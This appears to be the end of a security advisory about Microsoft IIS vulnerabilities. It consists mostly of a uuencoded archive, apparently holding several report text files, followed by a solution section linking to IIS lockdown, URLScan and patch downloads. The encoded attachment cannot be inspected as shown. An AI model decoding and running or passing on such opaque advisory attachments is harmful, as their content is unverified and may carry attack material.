	M4FH.+&\"7K`5).]$V/%&XA$?3LG;5RN1(_709ME$5N50P96SJ2[FFHJ]?Z6\"F

	M%*QA09%<EQPAHC(A8&P99PQNU@9;/ADLNAV7-YSZL]1&%J1V8\'52*FLR#;=V

	MY1(92:4ZBC!4`\"%B([IMN@.B;!QN6CX%N2=2F$%J1G:0)\"KTV\'=6E*,0K<*,

	MHX#!DT<P2`ND<S;:/`-\\J7)^PYH\";V&,(K-(U@96\"RE7MAS7S@NJJ$J8$99-

	M,ZZ$65*8EC+FW\"[_U`,)X\"(>[WFX3O>HVEH@N4M4@0MR1ET0H[GZKS+.C?_!

	M\'4UD=*4NWZ6Z\"C?G<6%\\JE\'8.:/4S61>K]E\'Y\"O`/39,5-J949RX8+OE;!%S

	M$8\'D++\\J0@[[K]A4\"B$\\*>5B]2DA/9NOH%($\'_H,U\\-\"H2;B7(Z099G]05UW

	M`,)U9A,4U^GW,H])CF[\'971,ZV/3Q$-,;5,5MXKC.<RU5;)&1@W0\"+NVJ9C,

	MPE5<-O=#A1!E$&\"$[%[J#\\L#HFU5[=!]J)ZW5TOL4,&K=MF.!+.NL$F!TP6\'

	M?-(-^3\'G=LK7F=WHFMU!8_O$,=Y`60NDR4>=F!\"!=R_L0PEOEINL1$^QP1;N

	MM.IV#H_URAL\\F\"N54E7B;ILS1*T9X=T`!Q&3]\"]BK,#AAB>;;59S/N5^W@M!

	M.2*,=4`XF`1\"PY=2%PBCR\'!J):G.L/O!O.3B-E2%,F\'5[5+#C\'R05$%W!)>Q

	MQ\'3M%,QUW[0,4!$IXJA=8?YJ5V-3K7=>&/B2O]LMIS\"67=,>](?],?-MS)7T

	MJ/FNK;(?8]HW>::-\\ZH-T&S-`#%V*`;AKS;@(!B8H)VJ%>U\"M:U=:XXH5*@$

	MAE3F[)EQH1U@\'-<KS8\"/#+L]F2-Q9F#[/M:PEGE1+-_L[6&7U\'?[J;V*.\"\'T

	M!^I?(\'>-;%+J5ON$E)R;+@[Y*<-`LLU*1&NPS3#QQA;3&NLL\'`5>K*`-D\"KV

	MW/0]-WWO_;4_W/4\'4_(3XN0=D(H+T#JQP*W?B\"N@M!9GR#**<L5I,_%=H:J0

	M.59OCV*VKM;(.!]5OE!S(OU;KFC).Q(0*+F-^E)E\'(OF)D?\'J4F\"[&F<\')W(

	MV`B5<+.U01:9C\'.M:8+@9IK=2V[HY)8EBM2HGVQ\"S95Q*5*_QZNQ1GD9PPJ9

	M_$+>Q4&[+_`.VXP\\OIL78CO8$8/#P^DN==\",\'9W$=T`B,:8\")K&GA;PF!U`^

	MHC@$N[O#5IC,/K+;(`(9HL2STNV3\"E,FJ;Q`_$A@5WF6FF(:L;L@4N2DD`4N

	M1!HR#H_*!U9NFBM(Q523<%T!(&D7!L*@!CY!(Q+KK,1`/3=M)Q1LJ<F,P`+X

	MFSH*II07;7[L.G52\"N-R0?`G96B*+L>MO>>)I>DZJMV%C!-#Y6=F@UJ<$>U%

	MEQ5*C#$96R)1PE;;U+K%5V5AV@#));$@J44ETSM5\"9[RUK0O?M=5T*5V4$V%

	M$\"GBPFRJN<TA*4\"30BB?L(SB^!HYOMG9N:E3\\H=+()V3\'F.7]\'-U)W-;Y%,3

	MJUZ.\\VV*)\'U/6M!S9^NR!+LYEUM);*H-BWLH%Z::0&75FL6QLTE\')&LFH

	M=T3,I3:`FWT=D>6M#G9N4#[J+*>]%C_\'6*.LP6DA3)JV=1\"&Y#^@+EVE`JM_

	M9>7\\JE0X0X$*VS9ZA6F%KA-\'><L3Y3*D7I4I\'J\'D!<?U(N/6Q#..T@R*IZ[)

	M1&S]7\'_M=H[^GU^F5W)=+A8RI\\YW\\WJ[`VCK\'8IEO(T@]X&JM8RH7<N=N345

	MPRB0.)-6SCU3-\'R1$39PTXT\\]6N6FP#6MD]DNK)XJEC0BH8^E4\'FQ2+98W_?

	M^WA%(<D?#?P^745N4O=<ZR(UY?\",1+WIK5Y\\AK#Q\\*#7?Q(.+`L;Y1Q,3P..

	M/UQ?B)O3=V<?+B\\N?_N\'>\'?9]RYN3OI8MA+SL9#<4<@62S+[1])A>YG*5\"<D

	MH>UU<K;94-7N$Z]WO]^(L].KT]UOO+H=:F^V6J^VW+-KT=:Y$L\\9K+A!R4\"H

	M<!Y)VZW;=^\":MM=_F.+!8US\'?5]XIK;B_D^(V9]0&5`G].8,`SY>7?YV=?Q>

	M?#J_N!\"7\'R[^`2RO;S\"JQI;R=I9D=VN\'[;-@=3M?U5_QS^U+K_<(K/^(4PK6

	M2O1T$<KHH3_O-2[^B(MQUI__M\'$MB6>/+N:TEVA?M&9EKBYS>;>0+@*(;=#P

	M>I_T\\,O^T#S*HIR#I)!NTP>9WP4>1?+\\-7V^__,SQORSV]F*HVVZ)[X[$B-<

	MVJ)K6YRPHNW>*P2O)5)T3OO>)97V@\'=^F]ZF/8^H=#M_^I]WWC:G;,5(#9@W

	M&$[Z/OX-8\'-3O]T&=]/KR66A,15E\'K+WPM2/CR#NT5@:G2ML]E/AT]1_\\:63

	M3Y=7)T+G`77=COP\'?Z\"&T6P0[([>[NWAJS\\:3T:3T=LMFKZW5[4$4\'>>G5Y<

	MO+L\\.:VH=#M_P5\\PXLA-/#14)A,UBWS[!2L<1($*\\*5W^S`(;A^BV>V#.NAV

	M;G&OA\\MTW:^NFZO,K%%\"\"-L^_WC$,`P^OVU=_Q5`FSO[?(<4N%(STL.1++)X

	MF^\\-#7AF&C@^PH)!T\'SWA.A1MY]^@X&A>S.30[I*3P)Z;[>V\")7!@7NF!*J?

	MKH^I[;:UTK3&]>6[OY_>;/\'G)$.$`GS84AVQ\"F!!&\'U-RBV7VP2-/_\"^7^D=

	MLBF_MBG6<6/DCFF6]XP)6*7N#FJMFK[.ELZ\"KZ2/+[\'I_M$`^MU\'QOX2R46<

	MK(^.?_UR_N\'TIG6+X9H72)K;%KR=UGWS@7\\=(:04_&G;Z(5\'ZB-:6A7;EKI\'

	M,\'RYOKDZ/7[O^3M6=GUTM#O8D/*:YXD`-0(VJB^)N66(V%)C6WO;1FKAI!:O

	M=[ZGWYZ._UME<%9\\WMD1%*+%HW7?R91BH*7FRO&Z\\8F(AMWN\\XB3+6&[$T5_

	MCOS#`[(]8UT:]7M\"68D3`FQI/+Y]F))AP\\[V]V%K_NW##.^(WI/;AW`*\"\\-U

	MY9MQ$8\\CNPL.<>6PQU2FX>W#D%PDJM\\SS#S`C`.L,(&U\'JC;!SFSU\\=$X<\"N

	MB3C\'5.CN_M#P(*49.0$/$XPY`,6#_0:%F9M+E(9,VU`916TJQ-L$[ZEO9Q(U

	M?#\\8N7F.\"LT81987N_YPW\\Q4$\\,+43O$>^\"WI1TS)O0I]&M<1F.#V(N4#I^G

	M9-$]M)1`909N1WB/#VI*!^!U-#%S)HQL9\'41[F_P,K*CIV[TYE@[SC?H1AP&

	M#[#63!DJ@]#$\'EK_)0ID3P<\\>P:,]Y6;9:B\\.\'/J5L2<R%C?^,!A8F;55%HS

	M1_5,0M8?-/E\\#I<I9NZ/VCIP5(+1IK0O41E.VU2:_D3:\'OO_#I7!!A72%WE`

	M)?UT4W*B1OYY(*V.)B^-QN?`4\"7)ZG&5U>VWK8XB0%,27QG[J:5IKD)4S$Q#

	M);061[IXD2??C!OLMS0]?5K3@95@X\'\\+EV!:X^*_@.*41P\\V8IB+\'=*OHQ19

	M&>,P-\'9\"\\8/MA2(E[HTG]76#&U&F;QQ/_3K6T;N*3L%CE\"-E^#>_\'14SJJ8R

	M\\FM*A`W-\'OLUM8JW@?4(WR$\\MCI2C=%CO]97TT;&UFXJ#8PX,K`.ZAQ`=Z3?

	MMHU@U*`PW;0&UA&/Z%7YB&RFR<^SU/R6IEF*VE[&DYHG0G?LU]\\/IQO?@Z=P

	MB2P?WZ3F-[\\3E4.R`[_!BXV]Y/,T:H;W_E/1`M+,@,V(T359S%+9K[/9L[,?

	M:;ORQHFA0CF:LCAS/7+W#+7J^K2^/F*$B0J/LG&7Z$?^X_7#6;M6\"$8U+L:_

	M#-<U+HP-H;=?OYU]N.^,JLW?8Y9HO-^VEZAAO[.1]4)KQR/+YR%\'>:?ARK^;

	M.6!#HD._ELKQ8:38K\'2<IIM2.\'L]#&H+4!;]IZE,K=61%!-(,#ILKS^;&,E>

	MXH-&UNC.GI#J2;ZF!@$3J6CM@]!0:7JAH[BY:KW2)KI.1^RW?KT>1>_I?AV#

	M:4624,U,1#_D-_L1?S)4#NT=TNK^L-;J9M8E*H>\'32K-B#G>L)%OX10TH@)%

	M86LO&]P/IRZ+/,:GQI\"],:PU_93^_C<HM_UH8B-1I=61TZKAD2(Y83,;-3-L

	M,*JI$)J#X#D<W)BG\\J3+L)7O/*ICS):9=BMV(S(XZO&Q.MIA5Z?I;O/;M/>V

	M,6IXU&N<KWMT>W34^]8).SHJTSIC]XC(^*CWQ*D[VC\'QN3L:_VA.<-3SW0UW

	MT]VN-UF\\`1OXP]\'K*6__MQ9JH;$-;0WP?*C-;@J[G?:]G1TW+5BNM[]O$[;[

	MR/8$R(M])V2MK^_L#CY[U3?OT6VSQK]#>_!9\'\'&WIMYC4EN[%G/`6\\U*3\'O/

	M\\SU[US9^M.TQ50-ZK_0K_;=7NF4(K[0Y3?D*(IGOK_3`-Y_H_Q\']=XQ7]>47

	MO/@^9O0\\/?!<#\\9K(ZZ\'GND.>\'KDZ;&WE.\'>:\\]VG;R_NAW3-WJ]Y^E@QXE+

	MO1MB&.`=.0PM_S1&X/5ZVW2>7N]@`\'X:`A)KO1W`9WM2!-,+PTDL\'FZ9,KC9

	M9@T-V]9>-=IR57<RS#C!C06QV=\'@YQ`.#M/2^.[Y1H)5I54C-1-XJ.4D5\\$]

	M.#%<&)-A/`PKMJUB9#-R_4B=]I]ZW%\'Z\\/O%1<6<GI=%F*V`J15C*T@RK6S?

	M1KN.X0LRW-`!Q3L9I]\\]WZ$AV]M<Z-$Z50?T-J4G8S\\6*J$3]-0*Q>LG>RZJ

	MV9<QW1AJAC::3H95^P@Q>+*?0[,\\>CB;EZF@IU+FN\"*U3INBD\'$U6J7_>KJ3

	M;U^G:?BM3C[]B8,,%ZI^/L.?.^/1\'=4[$GMAJG*7E+C)!P0]$9G$:\"O-$

	M+5B$=+:M?YGR69WT[M$)AM@>]Z-\'=6L^?4?@=#LD/TOO5N-S#.ZL;NL\\N2S:

	M([N=599_U7P\\AL]/P1K=09M,\\3G6A9*ITT)UM*DZNFIU4<B<;AF5\\--FJ<UC

	M/J9%9S^R!4W+@D\":TTKF[!$S!PDK=G=GV0,E(H7PB&GW<0!)?Z#\'2@4]P$TE

	M9`ER!21))\'/,D([4I.+XCVW*=O1\\YP]WH\':\'3S/PLG0PKB_3-69YC$$8RR1K

	MHLRVS$UW>&:\\I),BPCZ#7L5:52\"0+9)]V3..PD)!3UY%\'%FE5`<+^(F=^;L*

	M\\^`9[D.\'TQJ/ERH+L@]:0CND];1E#X9EU49VPL\\4LZ2TY\\H?D3(\'-)X]GN&X

	MT\'OV#W;(;O]6_?G.^<G1_F0Z\'!ESM\\>TF\\O8=>J3\"D/?\'YA3\"NY1$AV&2,05

	MW=5\\:\"._YP=2UE\'.6X_*7WS(U^U4C_G.\"_M\'+:*@JD//8YA*V!>_P&SM&8\"[

	M4O+9!V4ME1[\\T<D3=^J!GJ[S`TI/U+I=65-<EKDNW<S<\\&YG)7+%W&\\^!A-T

	M,8\'+S_E/9W[>N/<_4$L!`A8+%`````@`0VB++!@@]I0\\!@``GPP```T`````

	M`````0`@`(\"!`````\')E<&]R=%\\Q,\"YT>\'102P$\"%@L4````\"``F9XLLW$%K

	M[N8!``!L`P``#``````````!`\"``@(%G!@``<F5P;W)T7S8N=\'AT4$L!`A8+

	M%`````@`&F>++`7?E=[W!P``K1,```P``````````0`@`(\"!=P@``\')E<&]R

	M=%\\U+G1X=%!+`0(6\"Q0````(`%IGBRS;F+>]W`,``,4\'```,``````````$`

	M(`\"`@9@0``!R97!O<G1?.\"YT>\'102P$\"%@L4``(`\"`\"!4J8LLM^M-$<5``\"K

	M-0``#``````````!`\"``@(&>%```<F5P;W)T7S$N=\'AT4$L%!@`````%``4`

	*(P$```\\J````````

	`

	end

	11080 bytes

	

SOLUTION

	Hint :
	

	Although the following will not protect you from all  vulnerabilities,
	it can do no harm to help secure your server with:
	

	http://www.microsoft.com/technet/security/tools/locktool.asp

	http://www.microsoft.com/technet/security/URLScan.asp

	

	

	Microsoft IIS 4.0:
	

	http://www.microsoft.com/Downloads/Release.asp?ReleaseID=37931

	

	Microsoft IIS 5.0:
	

	http://www.microsoft.com/Downloads/Release.asp?ReleaseID=37824

	

	Microsoft IIS 5.1:
	

	http://www.microsoft.com/Downloads/Release.asp?ReleaseID=37857

	

	Microsoft IIS 6.0:
	

	Beta versions of .NET Server after Build 3605 contain fixes for IIS 6.0

	

